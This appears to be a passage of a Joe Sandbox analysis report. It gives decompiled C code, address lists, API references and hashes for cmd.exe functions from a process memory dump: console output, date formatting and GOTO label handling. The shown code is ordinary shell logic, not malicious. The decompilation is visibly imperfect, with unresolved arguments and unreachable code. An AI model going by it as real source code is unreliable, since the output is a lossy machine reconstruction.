Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

??_V@YAXPAX@Z.MSVCRT ref: 001C4991
??_V@YAXPAX@Z.MSVCRT ref: 001C499E
longjmp.MSVCRT(001EB8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 001CE94C

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$Heap$AllocProcesslongjmp
String ID:
API String ID: 2656838167-0
Opcode ID: 4b85418ffe1a4ad2edb6a70235b47e60643b236f8666a7fa911ff3894f071ffc
Instruction ID: 32537889a5ecc29fd9f0c90352151e9d34f29127ef0e38195ba0072286067757
Opcode Fuzzy Hash: 4b85418ffe1a4ad2edb6a70235b47e60643b236f8666a7fa911ff3894f071ffc
Instruction Fuzzy Hash: 6DD1C0749042248FDB38DF14C8A1FAABBB4AF64704F4441DDE94AA7291DB30EE81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 001BB6CB Relevance: 9.2, APIs: 6, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001BB6CB(void** __ecx, intOrPtr _a8) {
				void _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				char _v76;
				short _v332;
				signed short _v342;
				signed short _v344;
				signed short _v346;
				struct _SYSTEMTIME _v348;
				int _v352;
				int _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				void** _v368;
				struct _FILETIME _v376;
				struct _FILETIME _v384;
				void _v420;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t96;
				void* _t97;
				void* _t103;
				intOrPtr _t114;
				void* _t115;
				void** _t121;
				void** _t122;
				void* _t125;
				void* _t126;
				void* _t135;
				void* _t136;
				signed short _t143;
				long _t153;
				short* _t155;
				void* _t161;
				signed int _t164;
				void* _t168;
				void _t170;
				void _t174;
				intOrPtr _t184;
				void* _t187;
				void* _t192;
				void** _t193;
				signed int _t195;
				signed int _t204;
				int _t207;
				void** _t215;
				void** _t216;
				signed int _t224;
				signed int _t228;
				void* _t229;
				void* _t232;
				void* _t238;
				void* _t240;
				intOrPtr _t248;
				signed int _t253;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t266;

				_t193 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t97 = E001C269C(_t96);
					_t260 =  *(__ecx + 0x10);
					if(_t97 == 0) {
						if(E001C27C8( *(__ecx + 8) +  *(__ecx + 8), _t260,  *(__ecx + 8) +  *(__ecx + 8),  &_v20) == 0) {
							goto L59;
						} else {
							_t179 =  *(__ecx + 8);
							_t101 =  *(__ecx + 8) + _t179;
							if(_v20 >=  *(__ecx + 8) + _t179) {
								goto L35;
							} else {
								goto L59;
							}
						}
					} else {
						_t184 = _t260 +  *(__ecx + 8) * 2;
						_v12 = _t184;
						if(_t260 < _t184) {
							_t238 = 0x2022;
							while(1) {
								_t259 = _t260;
								if(_t260 >= _t184) {
									goto L35;
								}
								while( *_t259 != _t238) {
									_t259 = _t259 + 2;
									if(_t259 < _t184) {
										continue;
									}
									break;
								}
								if(_t259 == _t260) {
									goto L48;
								} else {
									_t192 = _t259 - _t260 >> 1;
									_v16 = _t192;
									__imp___get_osfhandle(0);
									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
										L59:
										_t202 = 1;
										if(E001C0178(_t101) == 0) {
											_t202 = 1;
											_t103 = E001D9953(_t102, 1);
											if(_t103 == 0) {
												_push(_t103);
												_push(0x70);
												goto L63;
											}
										} else {
											_push(0);
											_push(0x1d);
											L63:
											E001BC5A2(_t202);
											_pop(_t202);
										}
										E001D9287(_t202);
										__imp__longjmp(0x1eb8b8, 1);
										asm("int3");
										_t204 = 9;
										memcpy( &_v420, _t260, _t204 << 2);
										_t266 = _t266 + 0xc;
										E001D3C49( &_v420,  &_v376);
										FileTimeToLocalFileTime( &_v376,  &_v384);
										FileTimeToSystemTime( &_v384,  &_v348);
										_v352 = 0;
										if( *0x1f3cc9 == 0) {
											_t245 = _v348 & 0x0000ffff;
											_t261 = _v346 & 0x0000ffff;
											_t258 = _v342 & 0x0000ffff;
											_v352 = _t245;
											if(_v364 == 0) {
												_t224 = 0x64;
												_t245 = _t245 % _t224;
												_v352 = _t245;
											}
											_t114 =  *0x1dd540; // 0x0
											if(_t114 != 2) {
												if(_t114 == 1) {
													_t135 = _t261;
													_t261 = _t258;
													_t258 = _t135;
												}
											} else {
												_t136 = _t245;
												_t245 = _t258;
												_t258 = _t261;
												_v352 = _t245;
												_t261 = _t136;
											}
											_t207 =  *0x1dd598; // 0x0
											if(_t207 >= 0x20) {
												_t115 =  *0x1dd594; // 0x0
												goto L92;
											} else {
												_t115 = realloc( *0x1dd594, 0x40);
												_pop(0);
												if(_t115 != 0) {
													_t245 = _v352;
													_t207 = 0x20;
													 *0x1dd594 = _t115;
													 *0x1dd598 = _t207;
													L92:
													_push(_t245);
													_push(0x1df80c);
													_push(_t258);
													_push(0x1df80c);
													E001C274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
													_t266 = _t266 + 0x20;
													_t258 = 2;
													goto L34;
												} else {
													_push(_t115);
													goto L79;
												}
											}
										} else {
											_v356 = 0;
											if(GetLocaleInfoW(E001C41A4(), 0x1f,  &_v332, 0x80) == 0) {
												_t245 = 0x80;
												E001C1040( &_v332, 0x80,  *0x1df7f8);
											}
											_t143 = _v332;
											_t263 =  &_v332;
											_t258 = 2;
											if(_t143 != 0) {
												_t195 = _v356;
												_t228 = _t143 & 0x0000ffff;
												_t161 = 0x64;
												do {
													if(_t228 == 0x27) {
														_t263 = _t263 + _t258;
														_t195 = 0 | _t195 == 0x00000000;
													} else {
														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
															_t263 = _t263 + _t258;
														} else {
															_t253 = 0;
															do {
																_t263 = _t263 + _t258;
																_t253 = 1 + _t253;
															} while ( *_t263 == _t228);
															_v356 = _t263;
															_t264 = _t263 +  ~_t253 * 2;
															if(_t253 != 1) {
																_t168 = 0x64;
																if(_t228 == _t168) {
																	_v360 = 0;
																}
																if(_t253 <= 3) {
																	_t263 = _v356;
																} else {
																	_t245 = _v356;
																	_t229 = _t245;
																	_v356 = _t229 + 2;
																	do {
																		_t170 =  *_t229;
																		_t229 = _t229 + _t258;
																	} while (_t170 != _v352);
																	_t263 = _t264 + 6;
																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
																	_t266 = _t266 + 0xc;
																}
															} else {
																_t232 = _t264;
																_t245 = _t232 + 2;
																do {
																	_t174 =  *_t232;
																	_t232 = _t232 + _t258;
																} while (_t174 != _v352);
																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
																_t266 = _t266 + 0xc;
																_t263 = _t264 + 4;
															}
														}
													}
													_t164 =  *_t263 & 0x0000ffff;
													_t228 = _t164;
													_t161 = 0x64;
												} while (_t164 != 0);
												_t193 = _v368;
											}
											if(GetDateFormatW(E001C41A4(), 0,  &_v348,  &_v332,  *0x1dd594,  *0x1dd598) == 0) {
												L31:
												_t261 = GetDateFormatW(E001C41A4(), 0,  &_v348,  &_v332, 0, 0);
												if(_t261 == 0) {
													_t153 = GetLastError();
													_push(0);
													goto L77;
												} else {
													_t261 = _t261 + 1;
													_t155 = realloc( *0x1dd594, _t261 + _t261);
													_pop(0);
													if(_t155 == 0) {
														_push(0);
														L79:
														_push(8);
														goto L80;
													} else {
														 *0x1dd594 = _t155;
														 *0x1dd598 = _t261;
														_t261 = 0;
														if(GetDateFormatW(E001C41A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
															_t153 = GetLastError();
															_push(0);
															L77:
															 *0x1f3cf0 = _t153;
															_push(_t153);
															L80:
															E001BC5A2(0);
															_t122 = 0;
														} else {
															L34:
															_t261 =  *0x1dd594; // 0x0
															goto L14;
														}
													}
												}
											} else {
												_t261 =  *0x1dd594; // 0x0
												if(_t261 == 0) {
													goto L31;
												} else {
													L14:
													_push(E001B5AA7(_v344 & 0x0000ffff));
													_t245 = 0x20;
													E001C1040( &_v76, _t245);
													if(_t193 == 0) {
														if(_v360 != 0) {
															if(E001B68B5() == 0) {
																_push(_t261);
																_push( &_v76);
															} else {
																_push( &_v76);
																_push(_t261);
															}
															_t121 = E001C25D9(L"%s %s ");
														} else {
															_push(_t261);
															_t121 = E001C25D9(L"%s ");
														}
														_t193 = _t121;
													} else {
														if(_v360 == 0 || _v364 != 1) {
															E001C1040(_t193, _a8, _t261);
														} else {
															_t126 = E001B68B5();
															_t248 = _a8;
															_t216 = _t193;
															if(_t126 != 0) {
																E001C1040(_t216, _t248, _t261);
																E001C18C0(_t193, _a8, " ");
																_push( &_v76);
															} else {
																E001C1040(_t216, _t248,  &_v76);
																E001C18C0(_t193, _a8, " ");
																_push(_t261);
															}
															E001C18C0(_t193, _a8);
														}
														_t215 =  &(_t193[0]);
														_t245 = 0;
														do {
															_t125 =  *_t193;
															_t193 = _t193 + _t258;
														} while (_t125 != 0);
														_t193 = _t193 - _t215 >> 1;
													}
													_t122 = _t193;
												}
											}
										}
										return E001C6FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
									} else {
										_t101 = _v16;
										if(_v8 != _v16) {
											goto L59;
										} else {
											_t184 = _v12;
											_t260 = _t259;
											_t238 = 0x2022;
											L48:
											while(_t259 < _t184) {
												if( *_t259 == _t238) {
													_t259 = _t259 + 2;
													continue;
												}
												break;
											}
											if(_t259 == _t260) {
												L55:
												_t238 = 0x2022;
												if(_t260 < _t184) {
													continue;
												} else {
													goto L35;
												}
											} else {
												if( *_t193 != 0) {
													SetConsoleMode( *_t193, 2);
												}
												_t187 = _t259 - _t260 >> 1;
												_v16 = _t187;
												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
												_t240 = 1;
												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
												_t101 = E001C06C0(_t240);
												if(_t260 == 0) {
													goto L59;
												} else {
													_t101 = _v16;
													if(_v8 != _v16) {
														goto L59;
													} else {
														_t184 = _v12;
														_t260 = _t259;
														goto L55;
													}
												}
											}
										}
									}
								}
								goto L102;
							}
						}
						goto L35;
					}
				} else {
					L35:
					_t193[1] = _t193[1] + E001BBED7(_t193, _t193[4]);
					 *(_t193[4]) = 0;
					_t193[2] = _t193[2] & 0;
					return 0;
				}
				L102:
			}

0x001bb6d4
0x001bb6dc
0x001c9996
0x001c999b
0x001c99a0
0x001c9a97
0x00000000
0x001c9a99
0x001c9a99
0x001c9a9c
0x001c9aa1
0x00000000
0x00000000
0x00000000
0x00000000
0x001c9aa1
0x001c99a6
0x001c99a9
0x001c99ac
0x001c99b1
0x001c99b7
0x001c99bc
0x001c99bc
0x001c99c0
0x00000000
0x00000000
0x001c99c6
0x001c99cb
0x001c99d0
0x00000000
0x00000000
0x00000000
0x001c99d0
0x001c99d4
0x00000000
0x001c99d6
0x001c99e0
0x001c99e6
0x001c99e9
0x001c99f9
0x001c9aa7
0x001c9aa9
0x001c9ab1
0x001c9abb
0x001c9abc
0x001c9ac3
0x001c9ac5
0x001c9ac6
0x00000000
0x001c9ac6
0x001c9ab3
0x001c9ab3
0x001c9ab5
0x001c9ac8
0x001c9ac8
0x001c9ace
0x001c9ace
0x001c9acf
0x001c9adb
0x001c9ae1
0x001c9ae4
0x001c9aeb
0x001c9aeb
0x001c9af9
0x001b5b59
0x001b5b6d
0x001b5b75
0x001b5b81
0x001c9bba
0x001c9bc1
0x001c9bc8
0x001c9bcf
0x001c9bdb
0x001c9be3
0x001c9be4
0x001c9be6
0x001c9be6
0x001c9bec
0x001c9bf4
0x001c9c09
0x001c9c0b
0x001c9c0d
0x001c9c0f
0x001c9c0f
0x001c9bf6
0x001c9bf6
0x001c9bf8
0x001c9bfa
0x001c9bfc
0x001c9c02
0x001c9c02
0x001c9c11
0x001c9c1a
0x001c9c4c
0x00000000
0x001c9c1c
0x001c9c24
0x001c9c2b
0x001c9c2e
0x001c9c36
0x001c9c3e
0x001c9c3f
0x001c9c44
0x001c9c51
0x001c9c51
0x001c9c57
0x001c9c58
0x001c9c59
0x001c9c62
0x001c9c67
0x001c9c6c
0x00000000
0x001c9c30
0x001c9c30
0x00000000
0x001c9c30
0x001c9c2e
0x001b5b87
0x001b5b87
0x001b5baa
0x001c9b09
0x001c9b11
0x001c9b11
0x001b5bb0
0x001b5bb7
0x001b5bbf
0x001b5bc3
0x001b5bc5
0x001b5bcd
0x001b5bd0
0x001b5bd1
0x001b5bd5
0x001c9b1d
0x001c9b24
0x001b5bdb
0x001b5bdd
0x001b5bf2
0x001b5cdd
0x001b5cdf
0x001b5ce1
0x001b5ce1
0x001b5ce3
0x001b5ce4
0x001b5ceb
0x001b5cf3
0x001b5cf9
0x001c9b2d
0x001c9b31
0x001c9b35
0x001c9b35
0x001c9b3e
0x001c9b82
0x001c9b40
0x001c9b40
0x001c9b46
0x001c9b4b
0x001c9b51
0x001c9b51
0x001c9b54
0x001c9b56
0x001c9b65
0x001c9b74
0x001c9b7a
0x001c9b7a
0x001b5cff
0x001b5cff
0x001b5d01
0x001b5d04
0x001b5d04
0x001b5d07
0x001b5d09
0x001b5d23
0x001b5d29
0x001b5d2c
0x001b5d2c
0x001b5cf9
0x001b5bdd
0x001b5bf4
0x001b5bf9
0x001b5bfe
0x001b5bfe
0x001b5c01
0x001b5c01
0x001b5c32
0x001b5d34
0x001b5d53
0x001b5d57
0x001c9b8d
0x001c9b95
0x00000000
0x001b5d5d
0x001b5d5d
0x001b5d68
0x001b5d6f
0x001b5d72
0x001c9ba9
0x001c9baa
0x001c9baa
0x00000000
0x001b5d78
0x001b5d7a
0x001b5d8c
0x001b5d93
0x001b5da4
0x001c9b98
0x001c9b9e
0x001c9b9f
0x001c9b9f
0x001c9ba4
0x001c9bac
0x001c9bac
0x001c9bb3
0x001b5daa
0x001b5daa
0x001b5daa
0x00000000
0x001b5daa
0x001b5da4
0x001b5d72
0x001b5c38
0x001b5c38
0x001b5c40
0x00000000
0x001b5c46
0x001b5c46
0x001b5c52
0x001b5c55
0x001b5c59
0x001b5c60
0x001c9c79
0x001c9c94
0x001c9c9a
0x001c9c9b
0x001c9c96
0x001c9c96
0x001c9c97
0x001c9c97
0x001c9ca1
0x001c9c7b
0x001c9c7b
0x001c9c81
0x001c9c87
0x001c9ca9
0x001b5c66
0x001b5c6d
0x001c9cd4
0x001b5c80
0x001b5c80
0x001b5c85
0x001b5c88
0x001b5c8c
0x001c9cb1
0x001c9cc0
0x001c9cc8
0x001b5c92
0x001b5c96
0x001b5ca5
0x001b5caa
0x001b5caa
0x001b5cb0
0x001b5cb0
0x001b5cb5
0x001b5cb8
0x001b5cba
0x001b5cba
0x001b5cbd
0x001b5cbf
0x001b5cc6
0x001b5cc6
0x001b5cc8
0x001b5cc8
0x001b5c40
0x001b5c32
0x001b5cda
0x001c99ff
0x001c99ff
0x001c9a05
0x00000000
0x001c9a0b
0x001c9a0b
0x001c9a0e
0x001c9a10
0x00000000
0x001c9a1f
0x001c9a1a
0x001c9a1c
0x00000000
0x001c9a1c
0x00000000
0x001c9a1a
0x001c9a25
0x001c9a6f
0x001c9a6f
0x001c9a76
0x00000000
0x001c9a7c
0x00000000
0x001c9a7c
0x001c9a27
0x001c9a2a
0x001c9a30
0x001c9a30
0x001c9a40
0x001c9a46
0x001c9a49
0x001c9a4f
0x001c9a57
0x001c9a59
0x001c9a60
0x00000000
0x001c9a62
0x001c9a62
0x001c9a68
0x00000000
0x001c9a6a
0x001c9a6a
0x001c9a6d
0x00000000
0x001c9a6d
0x001c9a68
0x001c9a60
0x001c9a25
0x001c9a05
0x001c99f9
0x00000000
0x001c99d4
0x001c99bc
0x00000000
0x001c99b1
0x001bb6e2
0x001bb6e2
0x001bb6ec
0x001bb6f6
0x001bb6f9
0x001bb702
0x001bb702
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 001C99E9
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C99F1
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 001C9A30
_get_osfhandle.MSVCRT ref: 001C9A49
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C9A51

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Console$Write_get_osfhandle$Mode
String ID:
API String ID: 1066134489-0
Opcode ID: 3d8cdeb5eee86937f8c490551ac6b448a7cb51dc64cb5b5293d3fc6f9d7a2334
Instruction ID: 7b236496c02e01f82b4b0b045e7c143025637eea5907af512e2fadd472e7e9f7
Opcode Fuzzy Hash: 3d8cdeb5eee86937f8c490551ac6b448a7cb51dc64cb5b5293d3fc6f9d7a2334
Instruction Fuzzy Hash: D241B531B002159BDF28AF78C88AFBEB3A9EB64705F14446EE905DB181EB74DD40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001BE5A8 Relevance: 9.1, APIs: 6, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E001BE5A8(struct HINSTANCE__** __ebx, struct HINSTANCE__* __edx, intOrPtr __edi, void* __ebp, void* _a4, intOrPtr _a8, struct HINSTANCE__* _a12, struct HINSTANCE__* _a16, struct HINSTANCE__* _a20, struct HINSTANCE__* _a24, struct HINSTANCE__* _a28, void _a32, void* _a536, intOrPtr _a544, void* _a548, int _a552, char _a556, int _a560, signed int _a572) {
				void* _v0;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t59;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t64;
				struct HINSTANCE__ _t66;
				int _t69;
				int _t74;
				struct HINSTANCE__* _t76;
				struct HINSTANCE__* _t83;
				struct HINSTANCE__* _t84;
				void* _t85;
				struct HINSTANCE__* _t86;
				struct HINSTANCE__* _t87;
				struct HINSTANCE__* _t88;
				struct HINSTANCE__* _t100;
				struct HINSTANCE__** _t102;
				void* _t103;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__ _t114;
				intOrPtr _t132;
				struct HINSTANCE__* _t133;
				void* _t134;
				void* _t135;
				struct HINSTANCE__* _t136;
				struct HINSTANCE__* _t137;
				signed int _t140;
				void* _t142;

				_t132 = __edi;
				_t126 = __edx;
				_t102 = __ebx;
				goto L1;
				L33:
				__eflags =  *((short*)( *((intOrPtr*)(_t126 + 0x38)))) - 0x3a;
				if( *((short*)( *((intOrPtr*)(_t126 + 0x38)))) != 0x3a) {
					goto L4;
				}
				_t136 = E001C00B0(0x50);
				__eflags = _t136;
				if(_t136 == 0) {
					L73:
					_t57 = 1;
					L32:
					_pop(_t134);
					_pop(_t135);
					_pop(_t103);
					__eflags = _a572 ^ _t140;
					return E001C6FD0(_t57, _t103, _a572 ^ _t140, _t126, _t134, _t135);
				}
				_t136->i = 0;
				_t63 = E001BDF40(L"GOTO");
				 *(_t136 + 0x38) = _t63;
				__eflags = _t63;
				if(_t63 == 0) {
					goto L73;
				}
				_t64 = E001BDF40( *((intOrPtr*)(_a24 + 0x38)));
				 *(_t136 + 0x3c) = _t64;
				__eflags = _t64;
				if(_t64 == 0) {
					goto L73;
				}
				_t126 = 1;
				_t64->i = 0x20;
				 *(_t136 + 0x40) = 0;
				_a28 = 1;
				L13:
				if(_t132 != 0) {
					__eflags = _t136;
					if(_t136 != 0) {
						_a20 = 0;
					}
				}
				_t114 = _t136->i;
				if(_t114 != 0 ||  *( *(_t136 + 0x38)) != 0x3a) {
					if(_t126 != 0) {
						_a28 = 0;
						_t66 = _t114;
					} else {
						_t66 = _t114;
						if( *0x1dd0c8 == 1) {
							_t66 = _t114;
							__eflags = _t114 - 0x3b;
							if(_t114 != 0x3b) {
								__eflags =  *0x1f8530;
								_t66 = _t114;
								if( *0x1f8530 == 0) {
									E001D6FF0(_t114);
									_t126 = 0;
									E001D2ED0(_t136, 0);
									E001C25D9(L"\r\n");
									_t66 = _t136->i;
									_t140 = _t140 + 4;
								}
							}
						}
					}
					if(_t66 == 0x3b) {
						_t136 =  *(_t136 + 0x38);
					}
					_a552 = 0;
					_a556 = 1;
					_a560 = 0x104;
					memset( &_a32, 0, 0x104);
					_t140 = _t140 + 0xc;
					if(_a556 == 0) {
						_t69 = 0x104;
					} else {
						_t69 = 0x7fe7;
					}
					if(E001C0C70( &_a32, _t69) < 0) {
						E001C0DE8(_t70,  &_a32);
						goto L73;
					} else {
						if(_t136 == 0) {
							_t136 = 0;
							_a16 = 0;
							L28:
							__imp__??_V@YAXPAX@Z(_a552);
							_t140 = _t140 + 4;
							goto L29;
						}
						if( *_t136 != 0 || E001BDFC0(0x2a,  *(_t136 + 0x38),  &_a16) != 0xffffffff) {
							L25:
							_t126 = _t136;
							_a16 = E001C0E00(2, _t136);
							E001C06C0(2);
							_t74 = GetConsoleOutputCP();
							 *0x1e3854 = _t74;
							GetCPInfo(_t74, 0x1e3840);
							_t137 =  *0x1dd5f8; // 0x0
							if(_t137 == 0) {
								_t76 =  *0x1dd0d0; // 0xffffffff
								__eflags = _t76 - 0xffffffff;
								if(_t76 != 0xffffffff) {
									L67:
									__eflags = _t76;
									if(_t76 != 0) {
										_t137 = GetProcAddress(_t76, "SetThreadUILanguage");
										 *0x1dd5f8 = _t137;
									}
									L69:
									__eflags = _t137;
									if(_t137 != 0) {
										goto L26;
									}
									SetThreadLocale(0x409);
									L27:
									_t136 = _a12;
									goto L28;
								}
								_t76 = GetModuleHandleW(L"KERNEL32.DLL");
								_t137 =  *0x1dd5f8; // 0x0
								 *0x1dd0d0 = _t76;
								__eflags = _t76 - 0xffffffff;
								if(_t76 == 0xffffffff) {
									goto L69;
								}
								goto L67;
							}
							L26:
							 *0x1f94b4(0);
							_t137->i();
							goto L27;
						} else {
							_t83 = E001BD7D4( *(_t136 + 0x38), 0x2a);
							__eflags = _t83;
							if(_t83 != 0) {
								goto L25;
							}
							_t39 = _t83 + 0x3f; // 0x3f
							_t84 = E001BD7D4( *(_t136 + 0x38), _t39);
							__eflags = _t84;
							if(_t84 != 0) {
								goto L25;
							}
							_t131 = _a552;
							__eflags = _a552;
							if(__eflags == 0) {
								_t131 =  &_a32;
							}
							_t85 = E001C10B0(_t136, _t131, __eflags, _a560);
							__eflags = _t85 - 2;
							if(_t85 != 2) {
								goto L25;
							} else {
								__eflags =  *(_t136 + 0x34);
								if( *(_t136 + 0x34) == 0) {
									L61:
									_t86 = _a552;
									__eflags = _t86;
									if(__eflags == 0) {
										_t86 =  &_a32;
									}
									_t126 =  *_t102;
									_push(_t86);
									_push(_t102[1]);
									_t87 = E001C1F52(_t102, _t136,  *_t102, _t132, _t136, __eflags);
									__eflags = _t87;
									if(_t87 != 0) {
										goto L71;
									} else {
										_t136 = 0;
										_a12 = 1;
										_a8 = 0;
										goto L28;
									}
								} else {
									_t126 = _t136;
									_t88 = E001D76C0(_a24, _t136);
									__eflags = _t88;
									if(_t88 != 0) {
										L71:
										__imp__??_V@YAXPAX@Z(_a544);
										_t140 = _t140 + 4;
										_t57 = 1;
										goto L32;
									}
									goto L61;
								}
							}
						}
					}
				} else {
					L41:
					_t136 = _a16;
					L29:
					if( *0x1f3cc4 != _t102) {
						L78:
						_t57 = _t136;
						goto L32;
					} else {
						_t132 = _a20;
						_t126 = _a24;
						L1:
						if( *0x1dd544 != 0) {
							E001D921A(_t102, _t132);
							_t126 = _a24;
						}
						 *0x1dd590 = 0;
						if( *0x1f3cc9 == 0 || _t132 == 0) {
							goto L4;
						} else {
							goto L33;
						}
					}
				}
				L4:
				_t133 = E001C0662(_t102);
				if(_t133 == 0xffffffff) {
					goto L73;
				}
				_t59 = E001BEEF0(3, _t133, _t102[4]);
				_t136 = _t59;
				__imp___tell(_t133);
				_t102[2] = _t59;
				_t142 = _t140 + 4;
				_t3 = _t133 - 3; // -3
				_t108 = 0;
				_t126 = _t133;
				if(_t3 > 0x5b) {
					L8:
					__imp___close(_t133);
					_t140 = _t142 + 4;
					if(_t136 == 0) {
						goto L41;
					}
					if(_t136 == 1 ||  *0x1ef980 == 0x234a) {
						E001D82EB(_t108);
						__eflags =  *0x1dd0c8 - 1;
						if( *0x1dd0c8 == 1) {
							__eflags =  *0x1f8530;
							if( *0x1f8530 == 0) {
								E001D6FF0(_t108);
								E001BC108(_t108, 0x2371, 1, 0x1e3892);
								_t140 = _t140 + 0xc;
							}
						}
						E001D9287(_t108);
						__imp__longjmp(0x1eb8b8, 1);
						goto L78;
					} else {
						if(_t136 == 0xffffffff) {
							_t57 = _a16;
							goto L32;
						} else {
							_t132 = _a20;
							_t126 = _a28;
							goto L13;
						}
					}
				}
				if(_t133 > 0x1f) {
					_t44 = _t133 - 0x20; // -32
					_t100 = 1 + (_t44 >> 5);
					__eflags = _t100;
					_t108 = _t100;
					do {
						_t126 = _t126 - 0x20;
						_t100 = _t100 - 1;
						__eflags = _t100;
					} while (_t100 != 0);
				}
				asm("btr eax, edx");
				goto L8;
			}

0x001be5a8
0x001be5a8
0x001be5a8
0x001be5a8
0x001be7ad
0x001be7b0
0x001be7b4
0x00000000
0x00000000
0x001be7c4
0x001be7c6
0x001be7c8
0x001cbfc5
0x001cbfc5
0x001be798
0x001be79f
0x001be7a0
0x001be7a1
0x001be7a2
0x001be7ac
0x001be7ac
0x001be7d3
0x001be7d9
0x001be7de
0x001be7e1
0x001be7e3
0x00000000
0x00000000
0x001be7f0
0x001be7f5
0x001be7f8
0x001be7fa
0x00000000
0x00000000
0x001be805
0x001be80a
0x001be80d
0x001be814
0x001be667
0x001be669
0x001be81d
0x001be81f
0x001be827
0x001be827
0x001be81f
0x001be66f
0x001be673
0x001be684
0x001be832
0x001be836
0x001be68a
0x001be691
0x001be693
0x001be89d
0x001be89f
0x001be8a2
0x001cbebb
0x001cbec2
0x001cbec4
0x001cbeca
0x001cbecf
0x001cbed3
0x001cbedd
0x001cbee2
0x001cbee4
0x001cbee4
0x001cbec4
0x001be8a2
0x001be693
0x001be69c
0x001be846
0x001be846
0x001be6ab
0x001be6b9
0x001be6c1
0x001be6cc
0x001be6d1
0x001be6dc
0x001cbeec
0x001be6e2
0x001be6e2
0x001be6e2
0x001be6f3
0x001cbfc0
0x00000000
0x001be6f9
0x001be6fb
0x001cbef6
0x001cbef8
0x001be76b
0x001be772
0x001be778
0x00000000
0x001be778
0x001be704
0x001be721
0x001be721
0x001be72d
0x001be731
0x001be736
0x001be742
0x001be747
0x001be74d
0x001be755
0x001cbf4d
0x001cbf52
0x001cbf55
0x001cbf72
0x001cbf72
0x001cbf74
0x001cbf82
0x001cbf84
0x001cbf84
0x001cbf8a
0x001cbf8a
0x001cbf8c
0x00000000
0x00000000
0x001cbf97
0x001be767
0x001be767
0x00000000
0x001be767
0x001cbf5c
0x001cbf62
0x001cbf68
0x001cbf6d
0x001cbf70
0x00000000
0x00000000
0x00000000
0x001cbf70
0x001be75b
0x001be75f
0x001be765
0x00000000
0x001be84e
0x001be856
0x001be85b
0x001be85d
0x00000000
0x00000000
0x001be866
0x001be869
0x001be86e
0x001be870
0x00000000
0x00000000
0x001be876
0x001be87d
0x001be87f
0x001be8ad
0x001be8ad
0x001be88a
0x001be88f
0x001be892
0x00000000
0x001be898
0x001cbf01
0x001cbf05
0x001cbf1a
0x001cbf1a
0x001cbf21
0x001cbf23
0x001cbf25
0x001cbf25
0x001cbf29
0x001cbf2d
0x001cbf2e
0x001cbf31
0x001cbf36
0x001cbf38
0x00000000
0x001cbf3a
0x001cbf3a
0x001cbf3c
0x001cbf44
0x00000000
0x001cbf44
0x001cbf07
0x001cbf0b
0x001cbf0d
0x001cbf12
0x001cbf14
0x001cbfa2
0x001cbfa9
0x001cbfaf
0x001cbfb2
0x00000000
0x001cbfb2
0x00000000
0x001cbf14
0x001cbf05
0x001be892
0x001be704
0x001be83d
0x001be83d
0x001be83d
0x001be77b
0x001be781
0x001cc011
0x001cc011
0x00000000
0x001be787
0x001be787
0x001be78b
0x001be5b0
0x001be5b7
0x001cbe97
0x001cbe9c
0x001cbe9c
0x001be5c4
0x001be5cb
0x00000000
0x00000000
0x00000000
0x00000000
0x001be5cb
0x001be781
0x001be5d5
0x001be5dc
0x001be5e1
0x00000000
0x00000000
0x001be5f1
0x001be5f7
0x001be5f9
0x001be5ff
0x001be602
0x001be605
0x001be608
0x001be60a
0x001be60f
0x001be62b
0x001be62c
0x001be632
0x001be637
0x00000000
0x00000000
0x001be640
0x001cbfcf
